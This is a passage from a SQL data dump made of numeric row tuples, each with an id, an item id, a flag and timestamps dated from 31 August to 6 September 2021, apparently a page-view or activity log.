05:35:49'),(32301,89,1,'2021-08-31','2021-08-31 05:37:43'),(32302,80,1,'2021-08-31','2021-08-31 05:58:56'),(32303,84,1,'2021-08-31','2021-08-31 06:28:24'),(32304,2248,1,'2021-08-31','2021-08-31 06:50:27'),(32305,3710,1,'2021-08-31','2021-08-31 07:12:28'),(32306,2309,1,'2021-08-31','2021-08-31 07:41:40'),(32307,1582,1,'2021-08-31','2021-08-31 07:56:43'),(32308,1608,1,'2021-08-31','2021-08-31 08:03:42'),(32309,2971,1,'2021-08-31','2021-08-31 08:15:12'),(32310,2904,1,'2021-08-31','2021-08-31 09:58:29'),(32311,1695,1,'2021-08-31','2021-08-31 10:03:09'),(32312,84,1,'2021-08-31','2021-08-31 10:04:02'),(32313,1608,1,'2021-08-31','2021-08-31 10:20:10'),(32314,1724,1,'2021-08-31','2021-08-31 10:29:07'),(32315,3060,1,'2021-08-31','2021-08-31 10:34:52'),(32316,3023,1,'2021-08-31','2021-08-31 11:06:14'),(32317,1774,1,'2021-08-31','2021-08-31 11:17:35'),(32318,1608,1,'2021-08-31','2021-08-31 11:28:51'),(32319,1594,1,'2021-08-31','2021-08-31 11:34:01'),(32320,1598,1,'2021-08-31','2021-08-31 11:37:54'),(32321,1724,1,'2021-08-31','2021-08-31 11:58:06'),(32322,80,1,'2021-08-31','2021-08-31 12:02:31'),(32323,68,1,'2021-08-31','2021-08-31 12:02:34'),(32324,108,1,'2021-08-31','2021-08-31 12:02:38'),(32325,76,1,'2021-08-31','2021-08-31 12:32:36'),(32326,1608,1,'2021-08-31','2021-08-31 12:33:23'),(32327,1602,1,'2021-08-31','2021-08-31 12:35:23'),(32328,1602,1,'2021-08-31','2021-08-31 12:50:16'),(32329,1602,1,'2021-08-31','2021-08-31 12:55:54'),(32330,1594,1,'2021-08-31','2021-08-31 12:55:56'),(32331,2813,1,'2021-08-31','2021-08-31 13:18:21'),(32332,1602,1,'2021-08-31','2021-08-31 14:38:42'),(32333,3030,1,'2021-08-31','2021-08-31 15:18:17'),(32334,1588,1,'2021-08-31','2021-08-31 16:06:16'),(32335,1608,1,'2021-08-31','2021-08-31 16:23:20'),(32336,1602,1,'2021-08-31','2021-08-31 16:46:57'),(32337,1602,1,'2021-08-31','2021-08-31 16:59:38'),(32338,80,1,'2021-08-31','2021-08-31 17:04:25'),(32339,1602,1,'2021-08-31','2021-08-31 17:05:09'),(32340,1728,1,'2021-08-31','2021-08-31 17:08:18'),(32341,1602,1,'2021-08-31','2021-08-31 17:08:43'),(32342,1594,1,'2021-08-31','2021-08-31 17:52:26'),(32343,2751,1,'2021-08-31','2021-08-31 17:52:42'),(32344,1608,1,'2021-08-31','2021-08-31 18:10:11'),(32345,469,1,'2021-08-31','2021-08-31 18:32:38'),(32346,3127,1,'2021-08-31','2021-08-31 18:39:08'),(32347,3781,1,'2021-08-31','2021-08-31 18:39:20'),(32348,3069,1,'2021-08-31','2021-08-31 18:43:23'),(32349,1586,1,'2021-08-31','2021-08-31 18:46:56'),(32350,1596,1,'2021-08-31','2021-08-31 19:01:38'),(32351,3710,1,'2021-08-31','2021-08-31 19:16:44'),(32352,3023,1,'2021-08-31','2021-08-31 19:31:46'),(32353,1588,1,'2021-08-31','2021-08-31 19:42:06'),(32354,472,1,'2021-08-31','2021-08-31 20:01:44'),(32355,2965,1,'2021-08-31','2021-08-31 20:16:47'),(32356,1582,1,'2021-08-31','2021-08-31 20:19:00'),(32357,1877,1,'2021-08-31','2021-08-31 20:24:51'),(32358,1598,1,'2021-08-31','2021-08-31 21:12:06'),(32359,1582,1,'2021-08-31','2021-08-31 21:17:16'),(32360,89,1,'2021-08-31','2021-08-31 22:10:24'),(32361,2904,1,'2021-08-31','2021-08-31 22:58:04'),(32362,1586,1,'2021-09-01','2021-09-01 00:15:12'),(32363,1602,1,'2021-09-01','2021-09-01 02:46:50'),(32364,80,1,'2021-09-01','2021-09-01 02:47:04'),(32365,80,1,'2021-09-01','2021-09-01 02:48:44'),(32366,1588,1,'2021-09-01','2021-09-01 04:12:45'),(32367,89,1,'2021-09-01','2021-09-01 04:36:10'),(32368,1586,1,'2021-09-01','2021-09-01 06:19:44'),(32369,3069,1,'2021-09-01','2021-09-01 06:38:17'),(32370,469,1,'2021-09-01','2021-09-01 07:02:42'),(32371,470,1,'2021-09-01','2021-09-01 07:28:37'),(32372,1614,1,'2021-09-01','2021-09-01 07:47:16'),(32373,2965,1,'2021-09-01','2021-09-01 08:23:19'),(32374,1608,1,'2021-09-01','2021-09-01 08:37:25'),(32375,2813,1,'2021-09-01','2021-09-01 09:00:39'),(32376,1602,1,'2021-09-01','2021-09-01 09:04:56'),(32377,1604,1,'2021-09-01','2021-09-01 10:01:31'),(32378,89,1,'2021-09-01','2021-09-01 10:21:16'),(32379,89,1,'2021-09-01','2021-09-01 10:22:14'),(32380,89,1,'2021-09-01','2021-09-01 10:22:54'),(32381,89,1,'2021-09-01','2021-09-01 10:23:39'),(32382,1602,1,'2021-09-01','2021-09-01 10:25:13'),(32383,89,1,'2021-09-01','2021-09-01 10:26:27'),(32384,1602,1,'2021-09-01','2021-09-01 10:27:12'),(32385,1608,1,'2021-09-01','2021-09-01 10:38:48'),(32386,1586,1,'2021-09-01','2021-09-01 10:39:19'),(32387,1582,1,'2021-09-01','2021-09-01 10:39:49'),(32388,2411,1,'2021-09-01','2021-09-01 11:10:24'),(32389,3285,1,'2021-09-01','2021-09-01 11:46:10'),(32390,1586,1,'2021-09-01','2021-09-01 11:52:19'),(32391,1608,1,'2021-09-01','2021-09-01 11:52:25'),(32392,1602,1,'2021-09-01','2021-09-01 11:52:27'),(32393,89,1,'2021-09-01','2021-09-01 11:52:52'),(32394,1544,1,'2021-09-01','2021-09-01 11:53:07'),(32395,1604,1,'2021-09-01','2021-09-01 11:55:22'),(32396,1602,1,'2021-09-01','2021-09-01 11:59:39'),(32397,87,1,'2021-09-01','2021-09-01 12:00:02'),(32398,1602,1,'2021-09-01','2021-09-01 12:00:59'),(32399,76,1,'2021-09-01','2021-09-01 12:01:05'),(32400,72,1,'2021-09-01','2021-09-01 12:02:47'),(32401,3680,1,'2021-09-01','2021-09-01 12:04:09'),(32402,72,1,'2021-09-01','2021-09-01 12:04:53'),(32403,2769,1,'2021-09-01','2021-09-01 12:12:24'),(32404,2159,1,'2021-09-01','2021-09-01 12:19:12'),(32405,2159,1,'2021-09-01','2021-09-01 12:19:29'),(32406,2159,1,'2021-09-01','2021-09-01 12:19:37'),(32407,1588,1,'2021-09-01','2021-09-01 12:53:52'),(32408,76,1,'2021-09-01','2021-09-01 12:54:15'),(32409,2309,1,'2021-09-01','2021-09-01 13:05:16'),(32410,1614,1,'2021-09-01','2021-09-01 13:39:31'),(32411,1602,1,'2021-09-01','2021-09-01 13:57:28'),(32412,472,1,'2021-09-01','2021-09-01 14:52:40'),(32413,2457,1,'2021-09-01','2021-09-01 14:52:53'),(32414,1582,1,'2021-09-01','2021-09-01 15:49:15'),(32415,1598,1,'2021-09-01','2021-09-01 16:15:28'),(32416,3102,1,'2021-09-01','2021-09-01 16:23:15'),(32417,3781,1,'2021-09-01','2021-09-01 16:34:12'),(32418,2165,1,'2021-09-01','2021-09-01 16:36:51'),(32419,2165,1,'2021-09-01','2021-09-01 16:37:00'),(32420,2165,1,'2021-09-01','2021-09-01 16:37:11'),(32421,2165,1,'2021-09-01','2021-09-01 16:37:32'),(32422,3764,1,'2021-09-01','2021-09-01 19:00:51'),(32423,3764,1,'2021-09-01','2021-09-01 19:06:09'),(32424,469,1,'2021-09-01','2021-09-01 20:15:45'),(32425,1718,1,'2021-09-01','2021-09-01 21:02:53'),(32426,3107,1,'2021-09-01','2021-09-01 21:18:12'),(32427,1610,1,'2021-09-01','2021-09-01 21:44:54'),(32428,1610,1,'2021-09-01','2021-09-01 21:44:56'),(32429,469,1,'2021-09-01','2021-09-01 21:45:01'),(32430,80,1,'2021-09-01','2021-09-01 22:30:29'),(32431,80,1,'2021-09-01','2021-09-01 22:31:43'),(32432,1614,1,'2021-09-01','2021-09-01 22:59:11'),(32433,2904,1,'2021-09-01','2021-09-01 23:04:30'),(32434,1602,1,'2021-09-01','2021-09-01 23:05:07'),(32435,1602,1,'2021-09-01','2021-09-01 23:05:19'),(32436,3313,1,'2021-09-01','2021-09-01 23:07:51'),(32437,1602,1,'2021-09-01','2021-09-01 23:10:27'),(32438,470,1,'2021-09-01','2021-09-01 23:11:07'),(32439,1602,1,'2021-09-01','2021-09-01 23:11:25'),(32440,470,1,'2021-09-01','2021-09-01 23:12:06'),(32441,89,1,'2021-09-01','2021-09-01 23:33:09'),(32442,2159,1,'2021-09-01','2021-09-01 23:41:42'),(32443,2159,1,'2021-09-01','2021-09-01 23:47:49'),(32444,76,1,'2021-09-01','2021-09-01 23:48:02'),(32445,2159,1,'2021-09-01','2021-09-01 23:48:08'),(32446,470,1,'2021-09-02','2021-09-02 00:55:35'),(32447,487,1,'2021-09-02','2021-09-02 01:09:55'),(32448,2804,1,'2021-09-02','2021-09-02 01:16:30'),(32449,2178,1,'2021-09-02','2021-09-02 01:41:15'),(32450,3430,1,'2021-09-02','2021-09-02 01:59:18'),(32451,1600,1,'2021-09-02','2021-09-02 02:41:32'),(32452,1596,1,'2021-09-02','2021-09-02 03:07:00'),(32453,91,1,'2021-09-02','2021-09-02 03:40:13'),(32454,1600,1,'2021-09-02','2021-09-02 03:41:36'),(32455,1872,1,'2021-09-02','2021-09-02 04:41:32'),(32456,1598,1,'2021-09-02','2021-09-02 04:53:10'),(32457,1600,1,'2021-09-02','2021-09-02 04:55:27'),(32458,89,1,'2021-09-02','2021-09-02 06:56:50'),(32459,1718,1,'2021-09-02','2021-09-02 07:24:30'),(32460,84,1,'2021-09-02','2021-09-02 07:28:03'),(32461,3251,1,'2021-09-02','2021-09-02 07:57:38'),(32462,2248,1,'2021-09-02','2021-09-02 08:22:13'),(32463,477,1,'2021-09-02','2021-09-02 08:32:42'),(32464,1600,1,'2021-09-02','2021-09-02 08:34:24'),(32465,1598,1,'2021-09-02','2021-09-02 08:44:56'),(32466,1588,1,'2021-09-02','2021-09-02 08:54:56'),(32467,1747,1,'2021-09-02','2021-09-02 09:25:25'),(32468,1614,1,'2021-09-02','2021-09-02 09:39:13'),(32469,1614,1,'2021-09-02','2021-09-02 09:39:39'),(32470,76,1,'2021-09-02','2021-09-02 10:07:50'),(32471,72,1,'2021-09-02','2021-09-02 10:27:35'),(32472,3680,1,'2021-09-02','2021-09-02 10:32:24'),(32473,84,1,'2021-09-02','2021-09-02 10:34:36'),(32474,3498,1,'2021-09-02','2021-09-02 11:15:50'),(32475,2309,1,'2021-09-02','2021-09-02 11:26:33'),(32476,1602,1,'2021-09-02','2021-09-02 13:26:52'),(32477,89,1,'2021-09-02','2021-09-02 14:03:27'),(32478,2178,1,'2021-09-02','2021-09-02 14:03:28'),(32479,2503,1,'2021-09-02','2021-09-02 14:30:10'),(32480,76,1,'2021-09-02','2021-09-02 14:30:55'),(32481,2503,1,'2021-09-02','2021-09-02 14:32:34'),(32482,3127,1,'2021-09-02','2021-09-02 14:49:11'),(32483,2558,1,'2021-09-02','2021-09-02 15:14:16'),(32484,1614,1,'2021-09-02','2021-09-02 15:49:12'),(32485,570,1,'2021-09-02','2021-09-02 16:49:58'),(32486,2769,1,'2021-09-02','2021-09-02 17:22:52'),(32487,1747,1,'2021-09-02','2021-09-02 18:09:14'),(32488,1602,1,'2021-09-02','2021-09-02 19:24:42'),(32489,1602,1,'2021-09-02','2021-09-02 19:24:44'),(32490,1608,1,'2021-09-02','2021-09-02 19:25:48'),(32491,1608,1,'2021-09-02','2021-09-02 19:25:48'),(32492,2252,1,'2021-09-02','2021-09-02 20:11:16'),(32493,1600,1,'2021-09-02','2021-09-02 20:29:34'),(32494,478,1,'2021-09-02','2021-09-02 20:32:36'),(32495,3789,1,'2021-09-02','2021-09-02 21:00:20'),(32496,3045,1,'2021-09-02','2021-09-02 21:09:44'),(32497,3045,1,'2021-09-02','2021-09-02 21:12:10'),(32498,89,1,'2021-09-02','2021-09-02 22:03:13'),(32499,478,1,'2021-09-02','2021-09-02 22:30:00'),(32500,2804,1,'2021-09-02','2021-09-02 22:32:02'),(32501,1594,1,'2021-09-02','2021-09-02 22:35:17'),(32502,1730,1,'2021-09-02','2021-09-02 22:39:22'),(32503,3694,1,'2021-09-02','2021-09-02 23:15:30'),(32504,3243,1,'2021-09-02','2021-09-02 23:15:50'),(32505,3243,1,'2021-09-02','2021-09-02 23:20:47'),(32506,1594,1,'2021-09-02','2021-09-02 23:35:13'),(32507,3694,1,'2021-09-02','2021-09-02 23:35:20'),(32508,1737,1,'2021-09-02','2021-09-02 23:52:39'),(32509,2991,1,'2021-09-03','2021-09-03 00:52:17'),(32510,2410,1,'2021-09-03','2021-09-03 01:40:33'),(32511,1739,1,'2021-09-03','2021-09-03 01:58:39'),(32512,1602,1,'2021-09-03','2021-09-03 02:06:27'),(32513,1594,1,'2021-09-03','2021-09-03 02:13:47'),(32514,570,1,'2021-09-03','2021-09-03 04:05:38'),(32515,3694,1,'2021-09-03','2021-09-03 05:06:00'),(32516,3774,1,'2021-09-03','2021-09-03 06:31:55'),(32517,3781,1,'2021-09-03','2021-09-03 06:32:02'),(32518,3764,1,'2021-09-03','2021-09-03 06:32:03'),(32519,3771,1,'2021-09-03','2021-09-03 06:32:04'),(32520,3777,1,'2021-09-03','2021-09-03 06:32:04'),(32521,3774,1,'2021-09-03','2021-09-03 06:32:15'),(32522,3777,1,'2021-09-03','2021-09-03 06:32:22'),(32523,3771,1,'2021-09-03','2021-09-03 06:32:22'),(32524,89,1,'2021-09-03','2021-09-03 06:39:59'),(32525,80,1,'2021-09-03','2021-09-03 07:30:14'),(32526,3107,1,'2021-09-03','2021-09-03 07:41:34'),(32527,1728,1,'2021-09-03','2021-09-03 07:50:58'),(32528,1728,1,'2021-09-03','2021-09-03 07:51:10'),(32529,1728,1,'2021-09-03','2021-09-03 07:51:20'),(32530,2503,1,'2021-09-03','2021-09-03 08:05:05'),(32531,3069,1,'2021-09-03','2021-09-03 09:00:38'),(32532,3041,1,'2021-09-03','2021-09-03 09:14:08'),(32533,2457,1,'2021-09-03','2021-09-03 09:52:34'),(32534,1602,1,'2021-09-03','2021-09-03 10:05:54'),(32535,484,1,'2021-09-03','2021-09-03 10:29:11'),(32536,1588,1,'2021-09-03','2021-09-03 10:38:20'),(32537,1586,1,'2021-09-03','2021-09-03 10:58:17'),(32538,3735,1,'2021-09-03','2021-09-03 10:59:02'),(32539,1586,1,'2021-09-03','2021-09-03 11:01:10'),(32540,1586,1,'2021-09-03','2021-09-03 11:01:43'),(32541,469,1,'2021-09-03','2021-09-03 11:05:35'),(32542,2252,1,'2021-09-03','2021-09-03 11:13:41'),(32543,3090,1,'2021-09-03','2021-09-03 11:36:03'),(32544,3102,1,'2021-09-03','2021-09-03 11:43:50'),(32545,1734,1,'2021-09-03','2021-09-03 12:02:55'),(32546,488,1,'2021-09-03','2021-09-03 12:13:45'),(32547,1596,1,'2021-09-03','2021-09-03 12:59:34'),(32548,3781,1,'2021-09-03','2021-09-03 13:17:55'),(32549,1582,1,'2021-09-03','2021-09-03 13:38:25'),(32550,1602,1,'2021-09-03','2021-09-03 14:17:53'),(32551,89,1,'2021-09-03','2021-09-03 14:23:03'),(32552,3045,1,'2021-09-03','2021-09-03 14:52:44'),(32553,2911,1,'2021-09-03','2021-09-03 14:59:46'),(32554,1711,1,'2021-09-03','2021-09-03 15:25:16'),(32555,2617,1,'2021-09-03','2021-09-03 15:25:16'),(32556,1711,1,'2021-09-03','2021-09-03 15:27:26'),(32557,1711,1,'2021-09-03','2021-09-03 15:27:55'),(32558,2813,1,'2021-09-03','2021-09-03 15:59:37'),(32559,3045,1,'2021-09-03','2021-09-03 16:19:01'),(32560,3107,1,'2021-09-03','2021-09-03 16:19:39'),(32561,2457,1,'2021-09-03','2021-09-03 18:02:54'),(32562,87,1,'2021-09-03','2021-09-03 18:10:13'),(32563,2457,1,'2021-09-03','2021-09-03 18:10:47'),(32564,80,1,'2021-09-03','2021-09-03 18:45:07'),(32565,3090,1,'2021-09-03','2021-09-03 18:48:56'),(32566,4275,1,'2021-09-03','2021-09-03 19:19:50'),(32567,1701,1,'2021-09-03','2021-09-03 19:48:39'),(32568,3090,1,'2021-09-03','2021-09-03 20:18:43'),(32569,1586,1,'2021-09-03','2021-09-03 21:08:40'),(32570,3694,1,'2021-09-03','2021-09-03 21:48:37'),(32571,74,1,'2021-09-03','2021-09-03 21:52:07'),(32572,3069,1,'2021-09-03','2021-09-03 21:57:21'),(32573,89,1,'2021-09-03','2021-09-03 22:08:40'),(32574,89,1,'2021-09-03','2021-09-03 22:28:42'),(32575,1588,1,'2021-09-03','2021-09-03 23:31:24'),(32576,3030,1,'2021-09-03','2021-09-03 23:47:38'),(32577,2159,1,'2021-09-04','2021-09-04 00:17:52'),(32578,3245,1,'2021-09-04','2021-09-04 00:37:58'),(32579,3053,1,'2021-09-04','2021-09-04 00:39:58'),(32580,3705,1,'2021-09-04','2021-09-04 02:28:14'),(32581,3297,1,'2021-09-04','2021-09-04 03:18:53'),(32582,106,1,'2021-09-04','2021-09-04 03:28:19'),(32583,2297,1,'2021-09-04','2021-09-04 03:38:37'),(32584,1598,1,'2021-09-04','2021-09-04 03:48:06'),(32585,1602,1,'2021-09-04','2021-09-04 03:56:35'),(32586,1602,1,'2021-09-04','2021-09-04 04:05:54'),(32587,3030,1,'2021-09-04','2021-09-04 04:27:49'),(32588,2297,1,'2021-09-04','2021-09-04 04:58:30'),(32589,3245,1,'2021-09-04','2021-09-04 05:28:27'),(32590,2154,1,'2021-09-04','2021-09-04 05:58:41'),(32591,1718,1,'2021-09-04','2021-09-04 05:58:42'),(32592,3058,1,'2021-09-04','2021-09-04 06:08:56'),(32593,2154,1,'2021-09-04','2021-09-04 07:40:08'),(32594,3269,1,'2021-09-04','2021-09-04 08:00:35'),(32595,3705,1,'2021-09-04','2021-09-04 08:21:03'),(32596,76,1,'2021-09-04','2021-09-04 08:21:37'),(32597,1586,1,'2021-09-04','2021-09-04 08:27:33'),(32598,3698,1,'2021-09-04','2021-09-04 08:32:40'),(32599,1586,1,'2021-09-04','2021-09-04 08:34:29'),(32600,1586,1,'2021-09-04','2021-09-04 08:37:09'),(32601,3704,1,'2021-09-04','2021-09-04 08:47:32'),(32602,80,1,'2021-09-04','2021-09-04 09:08:29'),(32603,0,1,'2021-09-04','2021-09-04 09:08:37'),(32604,80,1,'2021-09-04','2021-09-04 09:11:44'),(32605,2904,1,'2021-09-04','2021-09-04 09:12:21'),(32606,2904,1,'2021-09-04','2021-09-04 09:14:09'),(32607,3004,1,'2021-09-04','2021-09-04 09:15:42'),(32608,2704,1,'2021-09-04','2021-09-04 09:45:43'),(32609,1596,1,'2021-09-04','2021-09-04 10:38:27'),(32610,2704,1,'2021-09-04','2021-09-04 11:45:42'),(32611,1586,1,'2021-09-04','2021-09-04 12:38:07'),(32612,1586,1,'2021-09-04','2021-09-04 12:38:50'),(32613,2904,1,'2021-09-04','2021-09-04 12:40:20'),(32614,102,1,'2021-09-04','2021-09-04 12:41:23'),(32615,1870,1,'2021-09-04','2021-09-04 13:20:17'),(32616,469,1,'2021-09-04','2021-09-04 14:30:57'),(32617,469,1,'2021-09-04','2021-09-04 14:33:55'),(32618,1614,1,'2021-09-04','2021-09-04 14:52:33'),(32619,89,1,'2021-09-04','2021-09-04 15:25:40'),(32620,2617,1,'2021-09-04','2021-09-04 15:30:43'),(32621,1699,1,'2021-09-04','2021-09-04 15:33:44'),(32622,3738,1,'2021-09-04','2021-09-04 16:16:56'),(32623,570,1,'2021-09-04','2021-09-04 16:30:06'),(32624,80,1,'2021-09-04','2021-09-04 16:41:57'),(32625,1606,1,'2021-09-04','2021-09-04 16:53:29'),(32626,3069,1,'2021-09-04','2021-09-04 18:32:31'),(32627,1732,1,'2021-09-04','2021-09-04 19:12:59'),(32628,1728,1,'2021-09-04','2021-09-04 19:15:11'),(32629,1732,1,'2021-09-04','2021-09-04 19:18:51'),(32630,1604,1,'2021-09-04','2021-09-04 19:31:10'),(32631,3781,1,'2021-09-04','2021-09-04 19:42:34'),(32632,2704,1,'2021-09-04','2021-09-04 19:47:52'),(32633,3746,1,'2021-09-04','2021-09-04 20:01:47'),(32634,4275,1,'2021-09-04','2021-09-04 20:07:24'),(32635,1718,1,'2021-09-04','2021-09-04 20:21:33'),(32636,3788,1,'2021-09-04','2021-09-04 20:22:18'),(32637,1600,1,'2021-09-04','2021-09-04 20:57:49'),(32638,3430,1,'2021-09-04','2021-09-04 21:02:46'),(32639,3038,1,'2021-09-04','2021-09-04 21:04:51'),(32640,91,1,'2021-09-04','2021-09-04 21:07:10'),(32641,3102,1,'2021-09-04','2021-09-04 21:08:12'),(32642,91,1,'2021-09-04','2021-09-04 21:08:36'),(32643,2178,1,'2021-09-04','2021-09-04 21:09:02'),(32644,3038,1,'2021-09-04','2021-09-04 21:09:34'),(32645,2704,1,'2021-09-04','2021-09-04 21:10:08'),(32646,3307,1,'2021-09-04','2021-09-04 21:18:57'),(32647,1770,1,'2021-09-04','2021-09-04 21:28:04'),(32648,1770,1,'2021-09-04','2021-09-04 21:33:37'),(32649,3307,1,'2021-09-04','2021-09-04 21:36:00'),(32650,3058,1,'2021-09-04','2021-09-04 21:36:13'),(32651,1699,1,'2021-09-04','2021-09-04 21:53:21'),(32652,3486,1,'2021-09-04','2021-09-04 22:10:34'),(32653,1747,1,'2021-09-04','2021-09-04 22:13:32'),(32654,1774,1,'2021-09-04','2021-09-04 22:24:07'),(32655,3109,1,'2021-09-04','2021-09-04 22:37:04'),(32656,1610,1,'2021-09-04','2021-09-04 22:42:28'),(32657,1701,1,'2021-09-04','2021-09-04 23:11:51'),(32658,1701,1,'2021-09-04','2021-09-04 23:13:56'),(32659,3694,1,'2021-09-04','2021-09-04 23:20:12'),(32660,3034,1,'2021-09-04','2021-09-04 23:32:39'),(32661,1747,1,'2021-09-04','2021-09-04 23:36:04'),(32662,3034,1,'2021-09-04','2021-09-04 23:38:52'),(32663,3004,1,'2021-09-05','2021-09-05 00:05:22'),(32664,2154,1,'2021-09-05','2021-09-05 00:16:24'),(32665,68,1,'2021-09-05','2021-09-05 00:24:07'),(32666,3781,1,'2021-09-05','2021-09-05 00:37:13'),(32667,2309,1,'2021-09-05','2021-09-05 00:49:38'),(32668,1870,1,'2021-09-05','2021-09-05 01:23:24'),(32669,1600,1,'2021-09-05','2021-09-05 01:23:28'),(32670,1870,1,'2021-09-05','2021-09-05 01:42:17'),(32671,1586,1,'2021-09-05','2021-09-05 01:45:45'),(32672,76,1,'2021-09-05','2021-09-05 02:18:43'),(32673,1732,1,'2021-09-05','2021-09-05 02:20:18'),(32674,1596,1,'2021-09-05','2021-09-05 02:40:53'),(32675,2751,1,'2021-09-05','2021-09-05 03:19:59'),(32676,1602,1,'2021-09-05','2021-09-05 03:30:49'),(32677,1602,1,'2021-09-05','2021-09-05 03:50:34'),(32678,1602,1,'2021-09-05','2021-09-05 04:01:20'),(32679,2148,1,'2021-09-05','2021-09-05 04:25:14'),(32680,2148,1,'2021-09-05','2021-09-05 04:25:22'),(32681,2148,1,'2021-09-05','2021-09-05 04:25:37'),(32682,74,1,'2021-09-05','2021-09-05 04:57:28'),(32683,3247,1,'2021-09-05','2021-09-05 06:15:47'),(32684,89,1,'2021-09-05','2021-09-05 06:51:34'),(32685,3275,1,'2021-09-05','2021-09-05 06:58:04'),(32686,3253,1,'2021-09-05','2021-09-05 06:58:19'),(32687,2704,1,'2021-09-05','2021-09-05 07:01:41'),(32688,1614,1,'2021-09-05','2021-09-05 07:24:24'),(32689,2801,1,'2021-09-05','2021-09-05 08:05:16'),(32690,2751,1,'2021-09-05','2021-09-05 08:09:23'),(32691,3269,1,'2021-09-05','2021-09-05 08:31:22'),(32692,1594,1,'2021-09-05','2021-09-05 08:32:37'),(32693,2801,1,'2021-09-05','2021-09-05 09:24:11'),(32694,469,1,'2021-09-05','2021-09-05 09:54:26'),(32695,2609,1,'2021-09-05','2021-09-05 11:13:04'),(32696,76,1,'2021-09-05','2021-09-05 11:14:27'),(32697,1600,1,'2021-09-05','2021-09-05 14:18:18'),(32698,1600,1,'2021-09-05','2021-09-05 14:18:25'),(32699,89,1,'2021-09-05','2021-09-05 14:23:03'),(32700,3253,1,'2021-09-05','2021-09-05 14:30:31'),(32701,3045,1,'2021-09-05','2021-09-05 14:57:58'),(32702,2911,1,'2021-09-05','2021-09-05 16:12:47'),(32703,1602,1,'2021-09-05','2021-09-05 16:32:33'),(32704,1602,1,'2021-09-05','2021-09-05 16:33:00'),(32705,3109,1,'2021-09-05','2021-09-05 16:37:26'),(32706,3243,1,'2021-09-05','2021-09-05 17:27:00'),(32707,2309,1,'2021-09-05','2021-09-05 17:31:04'),(32708,2804,1,'2021-09-05','2021-09-05 17:43:41'),(32709,1600,1,'2021-09-05','2021-09-05 18:05:07'),(32710,1586,1,'2021-09-05','2021-09-05 18:55:35'),(32711,1870,1,'2021-09-05','2021-09-05 20:03:51'),(32712,1872,1,'2021-09-05','2021-09-05 20:20:12'),(32713,1592,1,'2021-09-05','2021-09-05 20:24:11'),(32714,1718,1,'2021-09-05','2021-09-05 20:56:12'),(32715,2751,1,'2021-09-05','2021-09-05 21:58:40'),(32716,1544,1,'2021-09-05','2021-09-05 22:14:42'),(32717,1596,1,'2021-09-05','2021-09-05 22:16:03'),(32718,89,1,'2021-09-05','2021-09-05 22:49:35'),(32719,3030,1,'2021-09-05','2021-09-05 23:17:11'),(32720,3789,1,'2021-09-05','2021-09-05 23:52:20'),(32721,1602,1,'2021-09-06','2021-09-06 00:51:57'),(32722,1602,1,'2021-09-06','2021-09-06 01:05:40'),(32723,1782,1,'2021-09-06','2021-09-06 01:07:54'),(32724,2410,1,'2021-09-06','2021-09-06 01:07:57'),(32725,3789,1,'2021-09-06','2021-09-06 01:17:18'),(32726,2154,1,'2021-09-06','2021-09-06 01:26:01'),(32727,3313,1,'2021-09-06','2021-09-06 01:27:09'),(32728,2904,1,'2021-09-06','2021-09-06 03:02:44'),(32729,335,1,'2021-09-06','2021-09-06 03:03:05'),(32730,68,1,'2021-09-06','2021-09-06 03:03:35'),(32731,3045,1,'2021-09-06','2021-09-06 03:07:28'),(32732,478,1,'2021-09-06','2021-09-06 03:32:05'),(32733,1606,1,'2021-09-06','2021-09-06 03:33:30'),(32734,1600,1,'2021-09-06','2021-09-06 03:48:05'),(32735,3124,1,'2021-09-06','2021-09-06 04:23:18'),(32736,2410,1,'2021-09-06','2021-09-06 04:32:00'),(32737,3175,1,'2021-09-06','2021-09-06 04:52:06'),(32738,1872,1,'2021-09-06','2021-09-06 04:54:13'),(32739,3534,1,'2021-09-06','2021-09-06 05:56:08'),(32740,3727,1,'2021-09-06','2021-09-06 06:12:11'),(32741,1544,1,'2021-09-06','2021-09-06 06:24:00'),(32742,80,1,'2021-09-06','2021-09-06 07:08:50'),(32743,2609,1,'2021-09-06','2021-09-06 10:00:08'),(32744,68,1,'2021-09-06','2021-09-06 10:00:41'),(32745,91,1,'2021-09-06','2021-09-06 10:00:49'),(32746,3541,1,'2021-09-06','2021-09-06 10:01:04'),(32747,3541,1,'2021-09-06','2021-09-06 10:01:05'),(32748,91,1,'2021-09-06','2021-09-06 10:01:44'),(32749,1602,1,'2021-09-06','2021-09-06 10:07:24'),(32750,1602,1,'2021-09-06','2021-09-06 10:07:26'),(32751,1602,1,'2021-09-06','2021-09-06 10:07:30'),(32752,2904,1,'2021-09-06','2021-09-06 10:10:59'),(32753,2904,1,'2021-09-06','2021-09-06 10:11:07'),(32754,2804,1,'2021-09-06','2021-09-06 10:13:37'),(32755,84,1,'2021-09-06','2021-09-06 10:15:07'),(32756,84,1,'2021-09-06','2021-09-06 10:15:28'),(32757,1877,1,'2021-09-06','2021-09-06 10:17:04'),(32758,3030,1,'2021-09-06','2021-09-06 10:34:25'),(32759,1718,1,'2021-09-06','2021-09-06 11:03:31'),(32760,3030,1,'2021-09-06','2021-09-06 11:03:32'),(32761,1602,1,'2021-09-06','2021-09-06 11:03:58'),(32762,2813,1,'2021-09-06','2021-09-06 11:13:40'),(32763,2309,1,'2021-09-06','2021-09-06 11:33:05'),(32764,2813,1,'2021-09-06','2021-09-06 11:33:19'),(32765,2309,1,'2021-09-06','2021-09-06 11:37:53'),(32766,1870,1,'2021-09-06','2021-09-06 11:43:13'),(32767,84,1,'2021-09-06','2021-09-06 11:46:46'),(32768,84,1,'2021-09-06','2021-09-06 11:46:47'),(32769,3694,1,'2021-09-06','2021-09-06 11:47:48'),(32770,68,1,'2021-09-06','2021-09-06 11:50:59'),(32771,1582,1,'2021-09-06','2021-09-06 11:51:28'),(32772,2503,1,'2021-09-06','2021-09-06 11:54:38'),(32773,2751,1,'2021-09-06','2021-09-06 11:54:55'),(32774,87,1,'2021-09-06','2021-09-06 11:56:14'),(32775,87,1,'2021-09-06','2021-09-06 11:56:30'),(32776,1602,1,'2021-09-06','2021-09-06 11:58:35'),(32777,1602,1,'2021-09-06','2021-09-06 11:58:56'),(32778,3664,1,'2021-09-06','2021-09-06 12:01:03'),(32779,84,1,'2021-09-06','2021-09-06 12:02:47'),(32780,1602,1,'2021-09-06','2021-09-06 12:09:13'),(32781,1774,1,'2021-09-06','2021-09-06 12:40:38'),(32782,2751,1,'2021-09-06','2021-09-06 13:02:24'),(32783,1718,1,'2021-09-06','2021-09-06 13:02:49'),(32784,1592,1,'2021-09-06','2021-09-06 13:25:07'),(32785,76,1,'2021-09-06','2021-09-06 14:30:15'),(32786,89,1,'2021-09-06','2021-09-06 14:30:30'),(32787,1600,1,'2021-09-06','2021-09-06 